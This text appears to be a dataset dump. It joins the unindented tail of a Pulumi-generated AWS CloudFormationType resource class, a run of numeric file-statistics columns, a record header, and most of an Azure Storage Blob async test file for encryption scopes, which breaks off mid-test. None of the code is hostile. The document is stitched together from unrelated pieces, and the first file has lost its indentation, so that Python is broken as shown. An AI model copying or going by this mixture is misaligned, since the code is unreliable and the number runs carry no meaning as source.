execution_role_arn: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']]] = None,
schema_handler_package: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
type_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CloudFormationTypeArgs.__new__(CloudFormationTypeArgs)
__props__.__dict__["execution_role_arn"] = execution_role_arn
__props__.__dict__["logging_config"] = logging_config
if schema_handler_package is None and not opts.urn:
raise TypeError("Missing required property 'schema_handler_package'")
__props__.__dict__["schema_handler_package"] = schema_handler_package
__props__.__dict__["type"] = type
if type_name is None and not opts.urn:
raise TypeError("Missing required property 'type_name'")
__props__.__dict__["type_name"] = type_name
__props__.__dict__["arn"] = None
__props__.__dict__["default_version_id"] = None
__props__.__dict__["deprecated_status"] = None
__props__.__dict__["description"] = None
__props__.__dict__["documentation_url"] = None
__props__.__dict__["is_default_version"] = None
__props__.__dict__["provisioning_type"] = None
__props__.__dict__["schema"] = None
__props__.__dict__["source_url"] = None
__props__.__dict__["type_arn"] = None
__props__.__dict__["version_id"] = None
__props__.__dict__["visibility"] = None
super(CloudFormationType, __self__).__init__(
'aws:cloudformation/cloudFormationType:CloudFormationType',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
default_version_id: Optional[pulumi.Input[str]] = None,
deprecated_status: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
documentation_url: Optional[pulumi.Input[str]] = None,
execution_role_arn: Optional[pulumi.Input[str]] = None,
is_default_version: Optional[pulumi.Input[bool]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']]] = None,
provisioning_type: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
schema_handler_package: Optional[pulumi.Input[str]] = None,
source_url: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
type_arn: Optional[pulumi.Input[str]] = None,
type_name: Optional[pulumi.Input[str]] = None,
version_id: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None) -> 'CloudFormationType':
"""
Get an existing CloudFormationType resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: (Optional) Amazon Resource Name (ARN) of the CloudFormation Type version. See also `type_arn`.
:param pulumi.Input[str] default_version_id: Identifier of the CloudFormation Type default version.
:param pulumi.Input[str] deprecated_status: Deprecation status of the version.
:param pulumi.Input[str] description: Description of the version.
:param pulumi.Input[str] documentation_url: URL of the documentation for the CloudFormation Type.
:param pulumi.Input[str] execution_role_arn: Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
:param pulumi.Input[bool] is_default_version: Whether the CloudFormation Type version is the default version.
:param pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']] logging_config: Configuration block containing logging configuration.
:param pulumi.Input[str] provisioning_type: Provisioning behavior of the CloudFormation Type.
:param pulumi.Input[str] schema: JSON document of the CloudFormation Type schema.
:param pulumi.Input[str] schema_handler_package: URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
:param pulumi.Input[str] source_url: URL of the source code for the CloudFormation Type.
:param pulumi.Input[str] type: CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
:param pulumi.Input[str] type_arn: (Optional) Amazon Resource Name (ARN) of the CloudFormation Type. See also `arn`.
:param pulumi.Input[str] type_name: CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
:param pulumi.Input[str] version_id: (Optional) Identifier of the CloudFormation Type version.
:param pulumi.Input[str] visibility: Scope of the CloudFormation Type.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CloudFormationTypeState.__new__(_CloudFormationTypeState)
__props__.__dict__["arn"] = arn
__props__.__dict__["default_version_id"] = default_version_id
__props__.__dict__["deprecated_status"] = deprecated_status
__props__.__dict__["description"] = description
__props__.__dict__["documentation_url"] = documentation_url
__props__.__dict__["execution_role_arn"] = execution_role_arn
__props__.__dict__["is_default_version"] = is_default_version
__props__.__dict__["logging_config"] = logging_config
__props__.__dict__["provisioning_type"] = provisioning_type
__props__.__dict__["schema"] = schema
__props__.__dict__["schema_handler_package"] = schema_handler_package
__props__.__dict__["source_url"] = source_url
__props__.__dict__["type"] = type
__props__.__dict__["type_arn"] = type_arn
__props__.__dict__["type_name"] = type_name
__props__.__dict__["version_id"] = version_id
__props__.__dict__["visibility"] = visibility
return CloudFormationType(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
(Optional) Amazon Resource Name (ARN) of the CloudFormation Type version. See also `type_arn`.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="defaultVersionId")
def default_version_id(self) -> pulumi.Output[str]:
"""
Identifier of the CloudFormation Type default version.
"""
return pulumi.get(self, "default_version_id")
@property
@pulumi.getter(name="deprecatedStatus")
def deprecated_status(self) -> pulumi.Output[str]:
"""
Deprecation status of the version.
"""
return pulumi.get(self, "deprecated_status")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
Description of the version.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="documentationUrl")
def documentation_url(self) -> pulumi.Output[str]:
"""
URL of the documentation for the CloudFormation Type.
"""
return pulumi.get(self, "documentation_url")
@property
@pulumi.getter(name="executionRoleArn")
def execution_role_arn(self) -> pulumi.Output[Optional[str]]:
"""
Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
"""
return pulumi.get(self, "execution_role_arn")
@property
@pulumi.getter(name="isDefaultVersion")
def is_default_version(self) -> pulumi.Output[bool]:
"""
Whether the CloudFormation Type version is the default version.
"""
return pulumi.get(self, "is_default_version")
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> pulumi.Output[Optional['outputs.CloudFormationTypeLoggingConfig']]:
"""
Configuration block containing logging configuration.
"""
return pulumi.get(self, "logging_config")
@property
@pulumi.getter(name="provisioningType")
def provisioning_type(self) -> pulumi.Output[str]:
"""
Provisioning behavior of the CloudFormation Type.
"""
return pulumi.get(self, "provisioning_type")
@property
@pulumi.getter
def schema(self) -> pulumi.Output[str]:
"""
JSON document of the CloudFormation Type schema.
"""
return pulumi.get(self, "schema")
@property
@pulumi.getter(name="schemaHandlerPackage")
def schema_handler_package(self) -> pulumi.Output[str]:
"""
URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
"""
return pulumi.get(self, "schema_handler_package")
@property
@pulumi.getter(name="sourceUrl")
def source_url(self) -> pulumi.Output[str]:
"""
URL of the source code for the CloudFormation Type.
"""
return pulumi.get(self, "source_url")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="typeArn")
def type_arn(self) -> pulumi.Output[str]:
"""
(Optional) Amazon Resource Name (ARN) of the CloudFormation Type. See also `arn`.
"""
return pulumi.get(self, "type_arn")
@property
@pulumi.getter(name="typeName")
def type_name(self) -> pulumi.Output[str]:
"""
CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
"""
return pulumi.get(self, "type_name")
@property
@pulumi.getter(name="versionId")
def version_id(self) -> pulumi.Output[str]:
"""
(Optional) Identifier of the CloudFormation Type version.
"""
return pulumi.get(self, "version_id")
@property
@pulumi.getter
def visibility(self) -> pulumi.Output[str]:
"""
Scope of the CloudFormation Type.
"""
return pulumi.get(self, "visibility")
| 50.1
| 616
| 0.679114
| 4,177
| 36,072
| 5.646158
| 0.057936
| 0.065765
| 0.071235
| 0.06903
| 0.878816
| 0.845404
| 0.816147
| 0.798211
| 0.785321
| 0.746523
| 0
| 0.001999
| 0.22322
| 36,072
| 719
| 617
| 50.16968
| 0.839686
| 0.395099
| 0
| 0.578049
| 1
| 0
| 0.127611
| 0.032524
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165854
| false
| 0.002439
| 0.017073
| 0
| 0.287805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a72d552d8d32245e2aec7a82cd2682ad80b093e
| 36,560
|
py
|
Python
|
sdk/storage/azure-storage-blob/tests/test_cpk_n_async.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2021-04-26T21:15:01.000Z
|
2021-04-26T21:15:01.000Z
|
sdk/storage/azure-storage-blob/tests/test_cpk_n_async.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2
|
2021-08-24T15:32:30.000Z
|
2021-08-24T23:21:34.000Z
|
sdk/storage/azure-storage-blob/tests/test_cpk_n_async.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2016-04-19T22:15:47.000Z
|
2016-04-19T22:15:47.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import asyncio
from datetime import datetime, timedelta
from azure.core.exceptions import HttpResponseError
from azure.core.pipeline.transport import AioHttpTransport
from multidict import CIMultiDict, CIMultiDictProxy
from azure.storage.blob import BlobType, BlobBlock, BlobSasPermissions, generate_blob_sas, ContainerEncryptionScope
from azure.storage.blob.aio import BlobServiceClient
from _shared.testcase import GlobalStorageAccountPreparer
from devtools_testutils.storage.aio import AsyncStorageTestCase
# ------------------------------------------------------------------------------
# The encryption scope are pre-created using management plane tool ArmClient.
# So we can directly use the scope in the test.
TEST_ENCRYPTION_KEY_SCOPE = "antjoscope1"
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE = ContainerEncryptionScope(
default_encryption_scope="containerscope")
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE = {
"default_encryption_scope": "containerscope",
"prevent_encryption_scope_override": True
}
# ------------------------------------------------------------------------------
class AiohttpTestTransport(AioHttpTransport):
"""Workaround to vcrpy bug: https://github.com/kevin1024/vcrpy/pull/461
"""
async def send(self, request, **config):
response = await super(AiohttpTestTransport, self).send(request, **config)
if not isinstance(response.headers, CIMultiDictProxy):
response.headers = CIMultiDictProxy(CIMultiDict(response.internal_response.headers))
response.content_type = response.headers.get("content-type")
return response
class StorageCPKAsyncTest(AsyncStorageTestCase):
async def _setup(self, bsc):
self.config = bsc._config
self.byte_data = self.get_random_bytes(64 * 1024)
self.container_name = self.get_resource_name('utcontainer')
if self.is_live:
await bsc.create_container(self.container_name)
def _teardown(self, bsc):
if self.is_live:
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(bsc.delete_container(self.container_name))
except:
pass
return super(StorageCPKAsyncTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name("cpk")
async def _create_block_blob(self, bsc, blob_name=None, data=None, encryption_scope=None, max_concurrency=1):
blob_name = blob_name if blob_name else self._get_blob_reference()
blob_client = bsc.get_blob_client(self.container_name, blob_name)
data = data if data else b''
resp = await blob_client.upload_blob(data, encryption_scope=encryption_scope, max_concurrency=max_concurrency)
return blob_client, resp
async def _create_append_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
await blob.create_append_blob(encryption_scope=encryption_scope)
return blob
async def _create_page_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
await blob.create_page_blob(1024 * 1024, encryption_scope=encryption_scope)
return blob
# -- Test cases for APIs supporting CPK ----------------------------------------------
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_put_block_and_put_block_list(self, resource_group, location, storage_account, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
self.container_name = self.get_resource_name('utcontainer')
blob_client, _ = await self._create_block_blob(bsc)
await blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
await blob_client.stage_block('2', b'BBB', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
await blob_client.stage_block('3', b'CCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
put_block_list_resp = await blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_block_blob_with_chunks(self, resource_group, location, storage_account, storage_account_key):
# parallel operation
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
# to force the in-memory chunks to be used
self.config.use_byte_buffer = True
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = await self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_block_blob_with_sub_streams(self, resource_group, location, storage_account, storage_account_key):
# problem with the recording framework can only run live
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
retry_total=0,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
# to force the in-memory chunks to be used
self.config.use_byte_buffer = True
blob_client, upload_response = await self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_block_blob_with_single_chunk(self, resource_group, location, storage_account, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
data = b'AAABBBCCC'
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = await self._create_block_blob(bsc, data=data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_put_block_from_url_and_commit(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
# create source blob and get source blob url
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # Make sure using chunk upload, then we can record the request
source_blob_client, _ = await self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
# create destination blob
self.config.use_byte_buffer = False
destination_blob_client, _ = await self._create_block_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act part 1: make put block from url calls
await destination_blob_client.stage_block_from_url(block_id=1, source_url=source_blob_url,
source_offset=0, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
await destination_blob_client.stage_block_from_url(block_id=2, source_url=source_blob_url,
source_offset=4 * 1024, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert blocks
committed, uncommitted = await destination_blob_client.get_block_list('all')
self.assertEqual(len(uncommitted), 2)
self.assertEqual(len(committed), 0)
# commit the blocks without cpk should fail
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2')]
with self.assertRaises(HttpResponseError):
await destination_blob_client.commit_block_list(block_list)
# Act commit the blocks with cpk should succeed
put_block_list_resp = await destination_blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data[0: 8 * 1024])
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_append_block(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client = await self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
for content in [b'AAA', b'BBB', b'CCC']:
append_blob_prop = await blob_client.append_block(content, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_append_block_from_url(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # chunk upload
source_blob_client, _ = await self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
destination_blob_client = await self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = await destination_blob_client.append_block_from_url(source_blob_url,
source_offset=0,
source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data[0: 4 * 1024])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_append_blob_with_chunks(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client = await self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = await blob_client.upload_blob(self.byte_data,
blob_type=BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_update_page(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client = await self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = await blob_client.upload_page(self.byte_data,
offset=0,
length=len(self.byte_data),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_update_page_from_url(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # Make sure using chunk upload, then we can record the request
source_blob_client, _ = await self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
blob_client = await self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = await blob_client.upload_pages_from_url(source_blob_url,
offset=0,
length=len(self.byte_data),
source_offset=0,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_page_blob_with_chunks(self, resource_group, location, storage_account, storage_account_key):
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
# Act
